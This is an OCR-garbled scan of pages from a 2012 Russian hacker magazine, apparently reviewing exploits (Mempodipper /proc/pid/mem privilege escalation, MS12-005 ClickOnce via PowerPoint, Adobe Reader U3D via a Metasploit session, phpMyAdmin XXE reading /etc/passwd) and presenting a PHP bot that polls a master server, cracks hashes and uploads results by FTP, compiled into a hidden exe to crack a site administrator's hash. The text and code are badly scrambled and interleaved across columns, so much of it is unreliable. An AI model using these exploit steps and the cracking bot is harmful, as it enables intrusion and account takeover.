int match; rcu_read_lock(); match=(ptrace_parent(task)==current); rcu_read_unlock(); i f (match && ptra ce_may_access(task, PTRACE_MODE_ATTACH)) return mm;

При открытии интерфейса / pгoc/<PID>/me m вас полня ется этакий ко д :

static int mem_open( struct inode* inode, struct file * file) { file- >private_data=( void*)(( long)current->self_exec_id); file- >f_mode 0=FМODE_UNSIGNED_OFFSET; return е ;·

mmput(mm); return ERR_PTR(-EPERM) ;

Стало бы ть , возьми изобретение не имеется никаких ограни ч е н ий - кто хочешь может это сде лать. Одн ако н а вслед пись равным образом считывание кое-какие ограничения вс ё­ таки обычай н овлены. Обратимся ко коду функции, которая осущест вля­

ет запис ь lприведена тротил ьк об н аиболее важная порция функции):

Чтобы из-за 14 сь пр ошла успешно, ее долженствует приводить в исполнение либо самовластно

п роцесс ltask==сuггепtl, либо папашечка , трассирующий текущий про­

static ssize_t mem_write( struct file * file, const char user * buf, size_t count, loff_t * ppos )

цесс сквозь рtгасе . Итиль зличные трюки со рtгасе невыгодный увенчались успехом,

позтому рассмотрим модификация не без; task

==сuггепt. Чт касательно неравно суд самолично

из-за пишет н контия ные нам данны е себя на память? Очевидно, в чем дело? н маг и волшебник на п ер­

вую ряд интересуют процессы со атрибутом

! * ... *! struct task_struct * task=get_proc_task( file- >f_path.dentry- >d_inode);

/ * .. . *!

" уеееее

su: us er

mm=check_mem_permission(task); copied=PTR_ERR(mm); i f (IS_ERR(mm)) goto out_free;

!*

$ su

suid . Волга ссмо т рим su:

haw I am а cowboy" haw I am а cowboy doe s not exist

уеееее

Л егко заметить, что-нибудь н а stdeгг выдается от тро ка, соз данная из нашим

участием. Казалось бы, да мы из тобой можем в рассуждении ткрыть /pгoc/< PID >/ mem , с п омощью lseeki) отрыть нужное площадь во памяти , со через dup211 связать неоригинальный лавина ошибок равно файловый дескриптор откры­

*/ i f ( file- >privat e_data !=( void *)( ( long) current->self_exec_id)) goto out_mm;

того / pг oc/< PID>/mem, вписать нужные данные, а ради т ем исполнить шелл-код . Однако неграмотный всё таково просто. Здесь выполняется вторая про­ верка , на ходе которой текущее значительность

self_exec _ id из равнива ется

со значением, вместе с палочка-выручалочка касательно щью которого был соз дан файловый -де скри п ­

0* .. . * !

тор / pгoc /< PID>/mem. Значение self_exec_ id инкреме нтир уется при Здесь проводятся двум проверкидля предотвращения неавтори­ эованной записи: check_mem_peгmission да

каждом запуске пр что до ц есса, посему автор сих строк безграмотный можем п олучи тьд оступ для

self_exec_id. Функция check_mem_pe гmission является беспритязательный обер т который чтобы __ check_

Тем невыгодный менее, эту проверку позволяется перегнать : вместе с через foгkll автор сих строк созда­

памяти вышеизложенным способом.

mem_peгmission, вона ч т что до возлюбленная делает:

ем потомица да вн у три него из через execll из т артуем новоиспеченный процесс.

static struct mm_struct * __ check_mem_permission( struct tas k_str uct * task )

значению у предка . Когда ты да я из-за п ускаем execll, sel f_exec_id увеличи­

Наш форкнутый пр относительно ц есс имеет значе ни е

self_exec_id , равное ее

вается получи еди вниз у. В нашем пото мке ты да я открываем шаг мя ть пр е д ка равным образом

создаем файловый д ескриптор на /pгoc/<P ID пр е д ка>/mе m , благодаря тому что

struct mm_st ruct *mm;

сверху что касается т крытие пропал провер ок. В предке т ем временем из-за п ускаем

su

ч ерез execl l, таким образом урав н ивая значения self_exec_id. Д алее

mm=get_task_mm(task); i f (!mm) return ERR_PTR(-EINVAL );

от помощью, по образу выразился самостоятельно соз верно те ль экс плоита , <<о чень черной

магии со кетов молод икс» п е р е даем предк уо ткрытый файловый д е ­ скриптор ото п отомка равно возвращаемсяк вышеупомянутому сценарию

i f ( task

current) return mm;

dup2 -> ехес. Осталось понять, за какому адресу свершать запись. По идее,

i f (task_is_stopped_or_traced(task)) {

ASLR

полагается утрудить нашу следовать д а ч у, одначе взгляни нате это:

$ readelf -h / bin /s u 0 grep

Туре

Туре:

file)

ЕХЕС

(ExecutaЬle

Выв од нам равно как бы нам екает, что такое? список

su использует не без; татич е­

ский а др йес сек ции .text !в ином случае был бы образец DYN, а неграмотный Е Х ЕС) . Это означает, ась?

su во большинстве дистрибутивов скомпи лиров ана Pl Е , от ледовательно, ASLR с целью секции .text ра бо­

кроме использования

жулик далеко не будет, что такое? у проща ет царапание эксплоита.

И схо дный ко д эксплоита Mempodippeг д осту пен сверху exgloit-db .com , EDB-10 08411 . Пр име р е г касательно использования представлен нате ск р равным образом нш о­ те.

it·!;lдJti Liпu x

>=2.6.39, 02-

равным образом 04-битные.

~i•J!Iiii•HI Д оверьобновлениеядрасвоемупакетномумене д жеруилиустанови Примерработыэксплоита

ХАКЕР ОЗ

/158/ 0012

Mempodipper

патч вручную.

057


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

0

MS12-005 Уязвимость процесса сборки

следавательности действий, требуемых в целях запуска встроенного

·

СliсkОnсе-приложения со полными правами доступа IFull Tгustl. В результатевыполнения описанных перед этим действий сверху экране

~3

CVSSV2

011111 011 011 01 01 0

появится цепь диалоговых окон. Однако пользователю невыгодный нужно

011 01

нисколько из ними готовить .

[AV N/AC M /дu .N /C C/I.C/AC)

Custom Animation'ы выполняются, если

PoweгPoint работает на ре ж да м е показа слайдов. Когда PoweгPoint на­

[]IШ

ходится во полноэкранном режиме, задним числом выполнения каждогодей­

Найденная9язвимостьпозволяетвыполнитьпроизвольныйкодна

ствия анимации происходит регенерация фокуса. После запус~а

удаленной системесправами текущего пользователя. Для сего

СliсkОnсе-приложения наш брат можем пересылать сведения диалоговым

ламер уязвимой системы долженствует завернуть для намеренно сфор­

окнам, дай тебе сложить их.

мированную wеЬ-страницу или — или растворить злокозненный обложка

Office.

Уязвимость присутствует во механизме безопасности

lj:JЦ!•Jii

Дело во том, что-то

Уязвимость, описанная во

Object Packageг. Object Packageг считает ClickOnce-фaйл безопасным, благодаря чему обложка такого в виде допускается насадить во свидетельство Office. Когда читатель уязвимой системы открывает документ, внедрен­

MS12-005, затрагивает двуха аспекта: 1. Метод определения исполняемого файла. Непропатченный packager.dll определяет, является ли обложка испол­

ный обложка автопилотом выполняется . Напомню, зачем

няемым, сопоставляя расширения файлов из элементами таблицы

ClickOnce- сие

!для комфорт назовем ее ехесЕхtТаЫе).

методика развертывания, позволяющая основывать самообновляе­ мые приложения

Windows,

которые могутустанавливаться равным образом запу­

.text:02FA1098 execExtTaЬle dd offset а_ехе ; DATA XREF: CPack age: :_GetCurrentlcon(~I C ~ )~69 0 о .text:02FA1D98 ; CPackaEe: :_Giv ewarni n gMsg { НWND__ * ) +5Е \ о .text:02FA1D98 ; " .ех е ~ .text:e2FA1D9C dd offset а - com ; " . сот -' .text:e2FA1Dдe dd offset а bat ~ " .bat" . text:02FA1DA4 dd offset а lnk " . ln k" .text :e2FA1DA8 dd offset а - cmd " .cmd" " . pif" .text:e2FA1DAC dd offset a_pif .text:e2FA1DB0 dd offset а - scr " . scr" .text:e2FA1DB4 dd offset а _js ; ". js " .text:e2 FA1DB8 dd offset а _jse ; ". j :se " . text:e2FA1DBC dd offset a_vbs _; ". vbs" . text: e2FA10Ce dd offset а - vbe ; ". vbe" .text:e2 FA1DC4 dd offset a_wsh ; " .wsh" .text:e2 FA1DC8 dd offset a_sct ~ " . stt ' .text:e2 FA1DCC dd offset a_vb _; " .vb" .text:e2FA1DD0 dd offset a_wsc ; " .wsc '~'~

скаться возле минимальном вмешательстве пользователя . Существует три способа публикации приложения

ClickOnce: от веб-страницы,

общего сетевого ресурса сиречь носителя, возьмем кусок шаг кт-диска . Его можно определить получи и распишись маршрутизатор конечного пользователя равным образом запустить локально, ажно разве умная машина отнюдь не подключен ко сети, сиречь впустить

во оперативном режиме, сверх установки каких-либо компонентов получи и распишись

пэвм конечного пользователя. При этом приложения

ClickOnce

могутобновляться самостоятельно, проверяя наличиедоступных новых версий равно механично заменяя однако обновленные файлы. Для реализации атаки на данном случае используем специальным

образом сформированный обложка презентации PoweгPoint. Эта про­

грамма позволяет нарядить Custom Animation'ы к ОLЕ-пакетов . В лента через обычных анимаций, пишущий сии строки можем задатьдве специфичные

про OLE анимации [которые называются Object Actions): Activate

Contents [активировать содержимое) равным образом Edit Package [редактировать пакет). При Activate Contents выполняются те но действия, сколько и при двойном щелчке пользователя по части встроенному объекту. Таким

образом,

Custom Animation'ы позволяют исполнять указанные вдоволь

I!IEIEI

~ C:\Python27\python.exe О&мен

nакетами

Ответ Ответ Ответ

ото

: отклик

от ОТ

через

вместе с

lb.wo~dp~e ss .com

02.233.69.6: 72.233.69.6: 72.233.69.6: 72.233.69.6:

ЧИСЛО ЧИСЛО ЧИСЛО ЧИСЛО

[72.233.69.6] no 02

& а ~т=32 &а~т=32 &а~т=32 &а~ т=32

В ре 0·1Я вреt·1Я вреt·1Я вреt·1Я

~татистика Ping nля 02.233.69.6: Пакетов: отnравлено=4, nолучено Приблизительное минута nриема - nереnачи

0,

0

0

Минимальное

=2 00t·1C =166t1c =168t·1C =166t1C

на

а

&а~т:

ТТL=127 ТТL=127 ТТL=127 ТТL=127

nот е ряно

=0 (0%

nотерь),

мс :

=166мсек, Максимальное=240 м из ек, Ср е nне е=185 м сек

C:,tmp)nslookup exploitshop.wo~dp~ess.com Can' t f ind se1•ve1' nате fo1• add1•ess 092 .168. 0. 0: Non - e x i ste n t domain ~e~ve~: google - puhlic - dns - a.google.com rdd~ess: 8.8.8.8

0***

~on-autho~itative answe~: ~ame: lb.wo~dp~ess.com ~dd~esses: 74.200.243.251, 1

02.233.2.58, 02.233.69.6, 06.74.254.120 76.74.254.123, 04.200.244.59

rliases:

exploitshop.wo~dp~ess. c om

C:,tm

>

Ре зу льтат эксплуатацииуязви мости- засунутый

058

Python- скри пт

ХАКЕР

03/1 08/2012


Обзор эксплоитов

.text:e2FA1DD4 dd offset a_wsf .text:e2FA1DD8 dd offset a_wmz

pdf-~rser.py -о 0В

".wsf" " .wmz "

"sr .pdr -r

Просто прокручиваем на цикле этутаблицу равно смотрим, имеет ли встроенный обложка такое а расширение, что равным образом элементтаблицы. Д ля этого используется цель l s P гogiOinlist:

push llh ; int dangerousTaЬle push offset execExtTaЬle .text:e2FA72FB push es i ; pExtName .text:e2FA72FC push е ; int . text: e2FA72FE call ?I sProgiDinl ist@@YGHPBG0PBQBGI@Z Is ProgiDinlist(ushort const * ,ushort co nst * , ; ushort const * const * ,uint) .text:e2 F AПF4 .text:e2FA72Fб

Нюанс состоит во том, в чем дело? во таблице приведена как только часть существующих расширений к исполняемых файлов. В качестве примера не грех взять хоть ру другими словами

pl. MS12-005 обходитэту проблемус по­

мощью функции AssoclsDangeгousl l , ко т орая проверяет расширения исполняемых файлов:

. text:e2FA6All push еах .text:e2FA6A12 call ds: __ imp__ AssocisDangerous@4 ; Assoc isDangerous(x) .text:e2FA6A18 test еах, еах . text:e2FA6Alд jnz short loc_2FA6A42

Вр е доно не без; хотя е со одра ж равным образом м об е 0D -о б ъекта на т е ле рdl - ф ай ла

А- фамилия , почти которым должна фигурировать активирована реферат . РО- изложение должна активироваться, в качестве кого всего только открывает­ ся страница, содержащая аннотацию сверху 0 D -данные.

lj:JЦ!e]ii Последовательностьзапу со ка объектов :

0. Вывод предупре ж дени й системы бе з опасности пользователю . packager.dll выдает предупреждения, исключительно если файл является исполняемым. Н по отношению рассмотрим функцию CPackage __ _ GiveWaгningMsgi H WND hWndl . Она снова проходит объединение табли ц е

Объект 0 - маневр OpenAction инициирует лозунг к JavaScript. Объект 04-JavaScгipt ссылается получай предмет 05. Объект 05- J avaScгipt-кoд применяеттехнику heap spraying,

ехесЕхtТаЫе, и, кабы растяжение встроенного файла далеко не содержится

впоследствии переходит получай вторую страницу.

на ехесЕхtТаЫе, никаких предупреждений неграмотный выдается.

Объект 01-определение 0D-данных да руководство их форматирова­

Пропатченный

ния.

Объект 0О - 0D-данные, которые будут представать !вероятно, поврежденные!.

it·1;ldfjfi Windows ХР, Windows Vista, Windows Sегvег 0008 SP2, Windows 0.

fi•J!Iij[•J:I

Объект ы, н а которыеследуетобратить внима н ие :

Объект 0О -ссылается нате именованные словари I/3D, /U3DI. Объект 01- ссылается получай именованные словари I/3DI, /3DD, / 0D,

Существует обновление, устраняющее эту уязвимость.

/ 0DAI.

0

Уязвимость на Adobe UЗD-данных

Reader присутствие обработке

CVSSV2

00.0

01111 01 01 011 01 011111

011 0 IAV: N/АС: L/Au: N/ С: С/1: С/А: С)

0ШIШ

Уязвимость вызвана ошибкой близ обработке U 0D-данных. Такая ошибка может вызвать ко сбою. П ри побег п ешной эксплуатации эта уязвимость позволяет злоумышлен ни ка м ввести полный контроль надсистем ой. Для обхода

DEP используется RОР-цепочка, icucnv36 .dll. Для обхода ASLR выполняет­ ся JavaScгipt-кoд, реализующий технику heap spraying. основанная в библиотеке

Кратко опишем U3D-компоненты, в надежде скорее лошадь мать, какие из них используетсплоит:

Объект 05 - охватывает JаvаSсгiрt-коддля реализации heap spraying равно перенаправления получи вторую страницу !инициирует

суд отображения 0D-данных ! . Сплоит реализован во Metasploit lпример вместе с полезной нагрузкой во виде запуска калькулятора):

msf > use explo i t/windows/fileformat/adobe_reader_uЗd msf e x plo i t(adobe_reader_uЗd) > set pay l oad win dows/exec payload=> windows/exec msf e x p l o it (adobe_ reader_uЗd) > set cmd calc . exe cmd=> calc . exe msf ex p l oit ( adob e_ r eader_uЗd ) > show options Module options (exploit/windows/ fi leformat/adobe_reader_uЗd): Name Cu r rent Setting Required Descr i ption

U3D- для нынешний миг беспримерный п оддерживаемый под­ тип равным образом 0D - объект.

F I L ENAМE

0DD lнеобходимl - определяе т наводнение либо азбуковник не без; 0D-данными,

OBFUSCATE

0DA lнеобязателенl - словарьактивации, самый значительный время,

msf.pdf false

yes по

The file name Е nаЫе JS obfuscation

подлежащими рендерингу.

когда-никогда долженствует выражать 0D-данные .

Payload options (windows/exec): Name Current Setting Requ i red

Description

0D I Iнеобязателенl - п еременная логического т ипа, определяю­ щая центральный система использования . Значение tгue соответствует интерактивному режиму,

DIS lнеобязателенl- имя, определяющее имущество 0D-данных придеактивации.

ХАКЕР ОЗ/ 0 0 0/ 0 01 0

CMD

calc.exe

yes

EXITFUNC

process

yes

false- взаимодействию при помощи JavaScript.

The comma nd string to execute Exit tec hni que: seh,thread,process,none

059


ВЗЛОМ/ОБЗОРЭКСПЛОИТОВ

Explpit target: Id Name е

<!ELEMENT foo ANY > <!ENTITY bar SYSTEM "file: /// etc / passwd" >

Adobe Reader 0.4.0 / 0.4.5 / 0.4.6

оп

Win

ХР SРЗ

msf exploit(adobe_reader_uЗd) > exploit [*] Creating 'msf.pdf' file .. . [+]

msf.pd~

> <foo>&bar;</foo>

stored at /home/pikofarad/.msf4/local/msf.pdf Здесь оnределяется nримитив Ьаг, тот или другой ссылается сверху обложка /et€/

i'·'.J1Jfi

passwd, равным образом nри обработкедокумента его содержание включается

Adobe Read eг 0.4.0 09.4.5 09.4.6 лещадь Windows ХР SP3.

на него. Кстати говоря, на ХМL-документ дозволено малограмотный лишь только заключать в себе

локальные равно удаленные файлы.

,_i,J!Iiii•J:I

В нем дозволяется вонзать исполняемые файлы, неравно парсеру раз­

заметано сие уделывать . По стандарту сие выглядит nримерно где-то :

Существует обновление, устраняющее эту уязвимость.

'

c?xml version="1.0 " encoding="utf-8" ?> < ! DОСТУРЕ foo

LFI во phpMyAdmin путем ХХЕ-инъекцию

[

CVSSV2

<! ELEMENT foo ANY> <!NOTATION GIF SYSTEM "http: // my-cool-site.com/ ShowGif.exe" > с! ЕNПТУ bar SYSTEM "http ://not-my-cool-site.com/ bar.gif" NDATA GIF >

0.0

011111 011 011 011 01111

011 [AV:N/АС: L/Au :N/C : Р/1 :N/A:N 0

[DШ В начале возраст обследователь Магсо Batista опубликовал весьма интереснуюуяз вимо вместе с тьтипа Loca l File lncluding. Эксnлуатируется

возлюбленная нетривиально, вследствие ХХ Е-инъекцию [ХХЕ -ХМ L eXteгnal Entity],

> cfoo>&bar; c/foo >

которая представляетсобой разночтение ХМ L-инъекции .

Напомню , ась? nри nомощи ХМL-инъекции [например, GЕТ­

В этом документе от п омо щью программы ShowGif.exe обрабатыва­

запроса ко веб-серверу] дозволено внести изменения начинка ХМL­

ется виньетка baг.gif. В некоторых случаях я можем ввести nо­

документа. Обычно выигрыш представляютфайлы базы данных

добную конструкцию посредством ХМ L-и нъекцию да претворить требуемый

xmiOB, гд е содержится рэнкинг что до пользователя х:

код. Более подробная ан фа об ХМ L-инъекциях снедать получи сайте OWASP

[goo.gi/BBG9C ]. c?xm l version="l . e" encoding="IS0-8859-1" ?> cusers > cuser > cusername> gandalf c/username> <password> !cЗ </password>

cuserid >0</user id > cmai l> /mail> </user>

lj:J4!•Jij В phpMyAdmin имеется в наличии функционирование имnорта базы данны х изо заданного пользователем ХМ L-фа йла. Уязвимос ть заключается на том, который по­ сле загрузки спецом сформированного ХМL-документа атаку­

ющий получает реальность [ограниченную nравами веб - сервера] прочит ать nрои зво льный обложка на системе иначе говоря локальной сети.

Уязвимос ть бери хо дится во файле l ibгaгies\impoгt\x m l .php, где функция simplexml_load_stгing[] вызывается безо проверки получи и распишись су ще­

<user> cu sername> Stefane c/ username> cpa ssword> wlsЗc </password>

cuser id >500 </userid> cmail >Stefane@whysec . hmm </mail> </user>

ствование ссылки получи и распишись поверхностный примитив:

$xml=simplexml_load_string($buffer, "SimpleXMLElement"J LIBXML_COMPACТ); Патченные версии phpMyAdmin на предотвращения инъекции

используют функцию l ibxml _disaЫe_e ntity_loadeг[], вовремя нежели за­

<user >

гружать ХМ L-документ.

Компания SECFORCE разработала устройство ко Metasploitдля экс­

< usernaшe> tony </username> <passwor d > UnбR34kЬ!e </ password >

cuserid> 000 </userid> cmail> s4tan@hell . com</mail> c/user> </ users >

плуатацииэтойуязвимости.ОнавтоматизируетnроцессLFiследую­ щи м образом:

0.

Логинится во phpMyAdmin от через предоставленных реквизи­ тов.

0.

СоздаетХМL-документ, применяя ХХЕ-инъекции ради заданного файла.

Смышленый пользователь сверх труда nроведет аналогию от SQLинъекциями, а ваш покорнейший слуга тем временем nерейду раскованно ко инъек­

0. 4.

Загружаетфайл сХМL-документом .

Пол у чаетуказанный обложка от серве ра.

циям подтипа ХХЕ . В судоремонтный завод ументах ХМ L существуюттак называемые

примитивы [entities], которые объявляются во начале дезоксикортикостерон уме нта во об­

Возможные оnции эксnлоита равным образом nример успешной эксплуатации соответственно ­

ласти ОТО. Существует порядком видов около м итивов, однако безотлагательно нас

казаны для скриншоте.

интересуюттолько внешние [e xteгnal entities]. Если во определении примитива присутствует URI, так возлюбленный называет не без; пишущий эти строки внешним. Соответ­ ственно, парсер обязан получитьдоступ ко этому URI равным образом подсоединить его со держимое на документ, когда сие было задано, например, так:

c?xml version="1.0" encoding="utf-8" ?> < !DOCTYPE foo

060

if.1;Jдjfi PhpMyAdmin 0.4.х

вnлоть до самого 0.4.7. 0 равным образом 0.3.х вплоть предварительно 0.3. 00.5.

f'·'••••t·'a

Обновиться узел перед вер эти phpMyAdmin 0.4.7. 0 [3 .3.1 0.5] иначе

установи ть соо тветствующий патч . ::х::

ХАКЕР

03/158/2012


хакинг

lqbzllhttp ://essenzo.netl ·

ows КОДИМ БОТА_АЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИИ Существует огромное количество bjt.ly/WdbrO -

языков программирования.

cлoвapи ради брута

Кто-то выбрал к себя С, кто­ то-

ASM,

а кто-то-

Python.

Я,

например, отдал привилегия

через Античата;

ш~ единолично с консольных

брутеров;

www.l2ko.de кoнвepтep батников.

неграмотный самому экзотическому

языку- РНР. А всё потому, что ми чаще нельзя не

На нашем диске ты сможешь отрыть

заниматься со вебом, нежели

весь необходимые

вместе с десктопом. Но бывают равно такие

файлы равно исходники, описанные на статье.

моменты, нет-нет да и тебе нужен специализированный софт, а его просто-напросто нет.

00 U SPEAK ENGLISH? NO,

РНР

Однажды. в сезон очередных ковыряний первоочередной

XSS,

ко ми

на лаги попал хеш движение вал пишущий эти строки администратора нужного ми ресурса. Ко­ нечно же, его надобно было расшифровать, равно ваш покорнейший слуга мгновенно обратился к различным онлайн-сервисам, помогающим со расшифровкой. Ни единовластно с них ми далеко не помог. С этой душевной печалью моя персона отправился бери ха к-форумы, идеже

на специальных разделах оставил просьбу об помощи во расшифров­ ке. Но да после этого меня ожидал фейл. Однако сайтик был вполне с себя расчудесный, равным образом лукать его админку ми капли невыгодный хотелось. Заварив очередную кружку кофе, пишущий эти строки начал думать, как бы поступить. Брутить нате своей машине малограмотный получилось бы- вычислитель слабоват. Значит, нужно было что-то около побеждать супермикроэвм со хорошими характе­

ристиками, да желательно бы безграмотный один. Покупать себя к родным пенатам

00

новых

мощных серваков за расшифровки одного хеша недавно отнюдь не входи­ ло на мои планы. Поэтому пишущий эти строки купил порядком выделенных серверов для распределения вычислений у одного хостера. Осталось всего ничего- настроить расшифровку. И вона тогда моя особа решил отдаться

062

ХАКЕР

03/158/2012


РНР-бот пользу кого

Windows

Комnилим кавасаки

во процесс. А n в рассуждении чему бы малограмотный настукать бота, пр равным образом н им ающего команду

function mySettings()

сверху расшифровку хеш а не без; общего сервера? М ож н в рассуждении б ыло равным образом написать,

{

только лишь видишь положение заключалась во том, сколько автор з н ал всего-навсего скрипто­

$settings=file_get_contents( 'http://adres.com/?do=mysettings' ); if ($settings !='' )

вые языки, а вместе с десктопом в жизнь не малограмотный имел дескать л а . И тогда во моей памя­ ти всплыла такая вещь, в духе всевозм в рассуждении жные р hр 0 е х е-компиляторы.

{ ОБЩАЯ СХЕМА

list($status, $statusdata) explode( ' 0' , $settings, 0 ); $config=array ( 'status'=> $status, 'data'=> $statusdata); return $config;

Бота автор решил понудить функционировать объединение совершенно определенному плану. Итак , существует сервер, получи и распишись ко об торый добавляются << За­ дания » . Боты отстукивают нате него каждые пятерка минут, проверяя, не появилось ли чтобы них новое задание.

И буде появилось, посылают серверу аппель в отношении том, почто б рут

начался. Сервер, во свою цепочка , добавляет во базу заметка об том,

else return false;

кто именно работает, а кто- нет. После завершения Брута лодка отправляе т серверу интерпелляция от уведомлением, который производство окончена. Этот запрашивание

равным образом может довольствовать расшифровку. При этом нужно содеять так, Эта ф у н для ция обращается ко нашему гейту, ловит ответ, и, ежели

с тем боты использовали отличаются как небо и земля словари ради брутфор са , приблизительно как брутить одинокий равным образом оный но лексика счета крата без труда безвыгодный имеет смысла. Также годится учесть, зачем хеш ей может фигурировать много, вследствие чего наша сестра

некто безграмотный п у ст ой , делит его в двум части там, идеже поглощать примета

0.

Первая

дробь представляет внешне команду на бота, а вторая- допол­

безвыгодный станем бранить поголовно лексика путем брутфорс в целях каждого с них.

нительные информация про этой команды. Теперь напишем функцию

В процессе б рута ты да я будем махом но испытывать результаты со все-

брутфорса получи и распишись основе заданных на виде аргумента хешей [массив) :

ми хешами, которые нужно расшифровать. Вообще, скрипт будет иметь только небольшую толику функций равно выступит, где-то сказать, на качестве

function bruteHashes($hashes)

обертки [шедулера), << дергающей>> ранее самопроизвольно брутфорсер. Именно

{

вследствие чего нам нужно поднять ёбаный брутфорсер, что работает

/1 Сохраняем хеыи про брутера file_put_contents( './brute.txt' , implode( "\r\n" , $hashes));

вследствие консоль, таково наравне ужотко наш брат переведем скрипт вехе, который тоже работает во консольной среде. Я использовал наработку моего знакомого- симпатия имеет экий синтаксис:

mdS.exe

{файл хешей} {файл словаря} {где сохранять}

Здесь главный параметр-это обозначение файла со хешами к

брутфорса [один хеш=одна строка), другой параметр-название

// Говорим серверу, что такое? ты да я еще работаем file_get_contents( 'http://adres.master .servera.com/?do=iamworking' ); /1 Брутим passthru( 'mdS.exe brute.txt vocabulary.txt results.txt' );

файла со словарем, а свежий параметр-название файла, в кой брутер хорэ расшифровывать результаты . Задачи серве­ ра- по совести ввести бота, циклично очищать рабочую

Сохраняем резу

$uploader

ьтат

сверху

сервере

no

Ф

r

=ftp_connect( 'ftp://adres.master.servera.com' );

папку, а как и отдавать сигналы в рассуждении том, что-то время бы еще начать б рут за таким-то хешам. Для основные положения напишем функцию обращения к серверу пользу кого получения текущего задания:

ХАКЕР

03 /158/2 012

ftp_login($uploader, 'login' , 'password' ); ftp_put($uploader, './results/' .time(). ' .txt' ,

063


взлом -

'./results.txt' , FTP_ASCII);

Q

&~~

ftp_close($uploader); //

Говорим серверу,

-

-

Bat Т что до Ехе Converter v1. 0

~(g] r8J

'~============~==============~l c=J c=J

~~'

.....-........

L __ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

-~

сколько наш брат закончили

0---

file_get_coпteпts(

Visblty

'http://adres.•aster.servera.com/?do=iamfinished' ); }

\VorЬ-Iodir~tory

@ anontdirodory о т..._...,-

о---

Итак, занятие беретик во качестве аргумента конгломерат вместе с хе шами

ЕлаурЬоn

да сохраняет его во удобоваримом пользу кого брутера формате, ведь кушать

0Et><тn>tlheor<I!J'10'

·-l

на виде текстового файла, на каждой строке которого находится один хеш. Затем кавасаки стучит возьми сервер со сигналом насчёт том, что-то начал

работать. Это нужно пользу кого того, дай тебе сер вер безвыгодный записывал бота в <<мерт вые >> машины, коли спирт неграмотный довольно выстукивать каждые высшая оценка

0 Addv.sta _ _ _

минут !тайм-аут согласно умолчанию), да помнил , в чем дело? лодка функционирует.

0 Adddeaщ>ieo'

Далее заводим самого бота, указав ему основанный обложка хе ш ей,

Oo..r.nte-Res

заданный словарник равным образом обложка для того сохранения результатов . Соз­

P.w~ter:

даем в свою очередь функцию <<ус тановки >> бота. Установка представляет собой считывание равным образом последующее консервация словаря, сообразно которо­

С-'<

му нужно брутить: fuпctioп iпstallVocab{)

....t

01

Exit

01

Компилим кофта дпя скрытного запуска брутера

{

$vocabulary=file_get_coпteпts( 'http://adres.com/unique_vocabulary.php' ); file_put_coпteпts( './vocabulary.txt' , $vocabulary);

да вновь запускаем шедулер. Нужно учесть, который обложка словаря не­

обходим сделано возле первом обращении для серверу, почему сделаем предохранитель, некоторый подготавли вает словар ь да запускает шедулер :

Серверный вместе с крипт, ко которому обращается бот, повинен воз­

поворачивать офигенно уникальные словари, воеже у каждой

if (!file_exists( './vocabulary.txt' ))

аппаратура был родной <<с ловарный запас>>. Также стои т оставить возможно сть трансформировать словарик от через команды, отправляемой

iпstallVocab();

чере з мастер-сервер . Теперь а нам нуждаться накадит ь самую

} startScheduler();

главную функцию- функцию шедулера, выполняющую также команды мастер-сервера. Объем статьи далеко не позволяет навести

компилим

после этого адрес этой функции полностью, вследствие чего укажу лишь только ее кейсы

!полный адрес ищи бери нашем диске):

Теперь, нет-нет да и да мы вместе с тобой объединили всё сие во единолично файл, на пороге нами

Ьгutе-брут;

встает проблема разбудить с него настоящий ехе. В этом нам по­

сlеап- очистка данных , полученны х во результате предыдущих

может небольшая тулза со длинным названием

брутфорсов;

Compileг/Embeddeг.

iпstаll-установка;

Bamba lam

РНР ЕХЕ

Она представляет с лица билдер, какой создает ехе изо РНР­

фай ла. Билдер следовать всё сезон его использования ни разу малограмотный подво­

ехit-выход.

дил, работал отлично, вне всяки х ба го на !респект авторам!). Этот билдер позволяет компи покрапывать экзешники на правах с целью РНР

По дефолту шедулер находи тс ваш покорнейший слуга на режиме ожидания команд . В качестве тайм-аута ты да я указали

000

0.0, приближенно

равно на

побольше новых версий интерпретатора. В простейшем случае компи­

секунд. Это временной

промежуток обращения б от на ко нашему серверу. Далее отлично пуск

ляция во

Bambalam

выглядит видишь так:

команд из учетом данных , переданных сервером боту, притом по­

сле выполнения команды наша сестра делаем пау зу lв некоторых случаях)

bamcompile

[-optioпs]

iпfile.php

[outfile . exe]

ОБЗОР КОМПИЛЯТОРОВ ИНТЕПРЕТИРУЕМЫХ ЯЗЫКОВ ПРОГРАММИРОВАНИЯ

0

РНР

bl

DeveiStudio

M<~miS4r

Однозначный заведующий

0

Php2exe tmJylyi'{4Y_R

0

Bambalam Embedder Ьit.ly/wpSпiZ .

'

ру2ехе

Ьit.ly/3~

lilli..Y!:

0

Peri2Exe Ьit.ly/y29qШ

Преобразует первоначальный

Более массированный инструмент,

Позволяет сочинять

за конвертированию РНР­

шифр в РНР во исnолняемый

далеко не имеющий

скрипты,написанные

перевода перловки вехе .

скриптоввполноценные

файл. Чтобысозданное

интерфейса да позволяющий

сверху Питоне, во экзешники.

Создает независимый исполняемый обложка ,

GUI-

Отличный инструментарий про

nрограммы . Тут

nриложемне могло

жете делать стоймя на рента .

Помимо исполняемого

да визуальная окружение

запуститься, во праздник а

Также комnилирует целые

файла, создаетнесколько

тот или иной работает во любых

программирования,

директории должна

проекты вместе с исnользованием

библиотек, помогающих

системах равным образом отнюдь не требует

равным образом настройка кода,

существовать книжное собрание

различных библиотек,

готовой программе

интерпретатора .

да отвод различных

php5ts.dll.

наnример

заnуститься .

cURL.

модулей да многое другое .

ХАКЕР

03/158/2012


РНР-бот ради

Windows

Сервис cmdS.ru предлагает Вам деньги проверки стойкости различных видов хеш-кодов (SНAl, З2 b1t MDS, MD4, mysql и т .д.). Наша товарищество занимается вопросами компьютерной безопасности от 0006 года. База данных самая большая на мире

да для теперешний сутки включает рядом

0,800,000,000,000 записей, 05% 50 Терабайт•

данных распределен в соответствии с кластеру равным образом составляет

Пожалуйста Зарегистрируйтесь либо Автошчуйтесь

.

-

....

с которых уникальны. Суммарный масштаб

. . -;. ·-f.,~ Сервис бери базе распределенных вычислений для того расшифровки МD5-хешей

Итак, лодка готов. Теперь займемся сервером. Во-первых, нужно зафиксировать во базе те боты, которые успешно отстучали нам

проходит сообразно во всех отношениях файлам во папке гesults, ступенчато открывает их равно добавляет на базу.

х отя бы нераздельно раз, ведь есть, эдак сказать, установленные боты. Для

